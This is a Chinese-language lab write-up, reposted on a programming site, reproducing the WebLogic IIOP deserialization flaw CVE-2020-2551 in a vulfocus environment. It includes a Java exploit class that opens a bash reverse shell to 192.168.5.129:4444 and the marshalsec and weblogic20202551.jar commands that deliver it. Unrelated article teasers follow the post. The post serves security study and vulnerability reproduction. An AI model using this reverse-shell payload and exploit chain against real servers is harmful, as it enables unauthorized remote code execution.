weblogic 反序列化 (CVE-2020-2551)漏洞复现(vulfocus)

news2025/2/25 9:51:32

漏洞简介

weblogic 反序列化 (CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。

启动服务

在这里插入图片描述
http://192.168.5.128:10710/console/login/LoginForm.jsp
首先打开此连接,初始化weblogic服务。
在这里插入图片描述

准备工具

exp-自己写一个即可.

javac  exp.java -source 1.6  -target 1.6

(此处指定编译的class文件的jdk版本。)
marshalsec-0.0.3-SNAPSHOT-all.jar

weblogic20202551.jar(该工具可以下载打包好的,也可以是自行打包,但需要指定weblogic的jdk与编译环境的jdk版本一致。否则会在使用时出现问题。)
weblogic20202551工具主要是用来iiop协议的调用。

首先marshalsec工具主要是利用rmi协议(可以直接在github上下载,也可以自己自行编译,下载后指定编译环境jdk1.8,然后使用mvn clean package -DskipTests,会在target目录下生成marshalsec.jar工具)。
在此期间,我尝试了使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,但并没有成功,后来发现这是由于jdk版本的问题,需要低版本的jdk生成exp。而JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具生成的最低的exp版本为jdk1.7。但我们需要的是jdk1.6的。

漏洞复现

生成exp

exp如下:

import java.io.IOException;
public class exp_jndi {
    static{
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.5.129/4444 0>&1"}); 
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] args) {
    }
}

原本想着使用netcat反弹shell,后来发现vulfocus这个环境中的netcat版本可能是比较老的版本,-e参数无法使用😅
在这里插入图片描述

开启http服务

在这里插入图片描述

指定rmi服务开放端口,并设置rmi转发exp地址。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.129/#exp_jndi" 1099

在这里插入图片描述

开启nc等待

在这里插入图片描述

使用weblogic20202551.jar 工具,指定rmi地址。

java -jar weblogic20202551.jar  192.168.5.128 10710  rmi://192.168.5.129:1099/exp_jndi

在这里插入图片描述

getshell

在这里插入图片描述

参考链接

marshalsec下载链接: https://github.com/mbechler/marshalsec
marshalsec jar版本下载链接https://github.com/RandomRobbieBF/marshalsec-jar
weblogic cve-2020-2551工具jar下载地址:https://github.com/zzwlpx/weblogicPoc/releases/tag/1.0
Weblogic CVE-2020-2551漏洞复现&CS实战利用:https://cloud.tencent.com/developer/article/1768466
Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞复现:juejin.cn/post/7219237666486239293

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/469112.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

企业编码生成系统--Python基础项目(4)

1. 成品展示🚗🚀🛫 运行🚀🚀🚀:1.在PyCharm中运行《企业编码生成系统》即可进入如图1所示的系统主界面。2.在该界面中可以选择要使用功能对应的菜单进行不同的操作。3.在选择功能菜单时&#x…

搭建electron-vue

electron-vue 准备工作修改package.jsonappveyor.yml.travis.yml.gitignore.eslintrc.js.eslintignore.babelrcsrc/renderer/main.jssrc/renderer/App.vuesrc/renderer/store/index.jssrc/renderer/store/modules/Counter.jssrc/renderer/store/modules/Counter.jssrc/renderer…

GT928 TP驱动跟读及虚拟按键上报解析

目前公司TP常用一套代码。MTK 平台使用.ko形式加载,所以跟读一下加深理解。 static struct i2c_driver tpd_i2c_driver {.driver {.of_match_table of_match_ptr(gt9xx_dt_match),},.probe tpd_i2c_probe,.remove tpd_i2c_remove,.detect tpd_i2c_detect,.dr…

万物皆数,算无止境 | 「雪浪算力开发者大赛」圆满收官

时在中春,阳和方起。 4月23日,「雪浪算力开发者大赛」 在雪浪小镇迎来完美收官。 本次大赛吸引了全球超过2422名开发者, 共有624支企业队伍, 288支高校队伍报名参赛, 累计提交作品9895份。 经过三个月激烈的角逐…

Linux shell编程 循环语句for continue break

for循环是编程语言中一种循环语句 示例1:循环读取user.txt中的用户名,创建用户。设置密码。 for i in $(cat /opt/user.txt) douseradd $iecho 123456 | passwd --stdin $i done 示例2:循环读取ipaddr文本文件中地址,执行ping命令…

基于空间矢量脉宽调制(SVPWM)的并网逆变器研究(Simulink)

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。 ⛳️座右铭&a…

day38—选择题

文章目录 1.在计算机网络中,TCP和UDP协议的相似之处是(D)2.下列哪项最恰当地描述了建立TCP连接时“第一次握手”所做的工作(C)3.关于以下 URL 的描述错误的是(A)4.不属于交换机攻击的是&#xf…

LangChain入门指南

LangChain入门 什么是LangChain如何使用 LangChain?LangChain的模型LangChain 的主要特点使用示例构建语言模型应用程序:LLMPrompt Templates: 管理LLMs的Prompts构建语言模型应用程序:Chat Model完整代码 什么是LangChain LangChain是一个强…

【C语言】leetcode每日一题

目录 前言题目描述题目分析代码描述 前言 时间过得真快,马上又要回家了,马上又要开始卷了。不是每朵鲜花都能代表爱情,但是玫瑰做到了;不是每棵树都能耐得住干渴,但是白杨做到了;不是每个人都在追求上进&a…

【算法思维】-- 动态规划(C++)

OJ须知: 一般而言,OJ在1s内能接受的算法时间复杂度:10e8 ~ 10e9之间(中值5*10e8)。在竞赛中,一般认为计算机1秒能执行 5*10e8 次计算。 时间复杂度取值范围o(log2n)大的离谱O(n)10e8O(nlog(n))10e6O(nsqrt(…

从CI/CD持续集成部署到DevOps研发运维一体化

今天整理下从传统的CI/CD到DevOps研发运维一体化的整个演进过程。类似于每日构建和冒烟测试,实际上在10多年前就已经在实践,比如当前用的笔记多的AntCruiseControl方式来实现自动化的编译构建和持续集成能力。 包括当前DevOps过程实践中的持续集成&…

基于Springboot的班级综合测评管理系统的设计与实现

摘要 随着互联网技术的高速发展,人们生活的各方面都受到互联网技术的影响。现在人们可以通过互联网技术就能实现不出家门就可以通过网络进行系统管理,交易等,而且过程简单、快捷。同样的,在人们的工作生活中,也就需要…

Android内存泄漏问题排查分析及常见解决方案

什么是内存泄漏: 在Android开发过程中,当一个对象已经不需要再使用了,本该被回收时,而另个正在使用的对象持有它引用从而导致它不能被回收,这就导致本该被回收的对象不能被回收而停留在堆内存中,内存泄漏就…

你真的熟悉多线程的程序的编写?快来查漏补缺

目录 一、Thread 类的属性及常用的构造方法 1.1、 Thread 常见构造方法 1.2、Thread 类的常见属性 1.3、启动(创建)一个线程 1.4、中断一个线程 1.5、等待一个线程 1.6、休眠当前线程 1.7、当前线程让出的 CPU 资源 二、线程状态 一、Thread 类…

华为OD机试真题(Java),整数编码(100%通过+复盘思路)

一、题目描述 实现一个整数编码方法,使得待编码的数字越小,编码后所占用的字节数越小。 编码规则如下: 编码时7位一组,每个字节的低7位用于存储待编码数字的补码;字节的最高位表示后续是否还有字节,置1表…

2023联网公司时薪排行榜出炉,多多排榜首。微软、美团很强

今天分享一个对于选择公司非常有用的参考:“互联网时薪”。 我们在选择一个公司的时候,往往会比较关注总收入package (除了基本的月薪,加上其他的所有的收入,包括但不限于奖金、股票或股份的分红等等)。 然而,总收入…

算力网络安全

算力网络安全 1. 算力网络简介1.1 基本概念1.2 应用场景 2. 算力网络安全需求3. 算力网络安全架构3.1 算力网络参考架构3.2 资源层安全3.3 控制层和编排管理层安全3.4 服务层安全 4. 算力网络安全关键技术4.1 安全计算4.2 安全编排4.3 数据溯源4.4 可信内生4.5 操作审计4.6 安全…

【服务器】Linux搭建我的世界服务器 + 公网远程联机教程

Yan-英杰的主页 悟已往之不谏 知来者之可追 C程序员,2024届电子信息研究生 目录 前言 1. 安装JAVA 2. MCSManager安装 3.局域网访问MCSM 4.创建我的世界服务器 5.局域网联机测试 6.安装cpolar内网穿透 7. 配置公网访问地址 8.远程联机测试 9. 配置固定…

ICMP 协议详解

文章目录 1 概述2 ICMP 协议2.1 工作原理2.2 报文格式2.3 ICMP 类型 1 概述 #mermaid-svg-6yUB8ZNYSzjbbDDq {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-6yUB8ZNYSzjbbDDq .error-icon{fill:#552222;}#mermaid-s…

Qt 路径

Qt 路径 Qt中路径问题小结目录与路径的区别路径分隔符Qt 路径与 Windows 路径转换相对路径mkdir 和 mkpath判断目录是否存在修改路径setPath Qt中路径问题小结 原文链接:https://blog.csdn.net/Andy_93/article/details/52831175 在做Qt项目的时候,我们…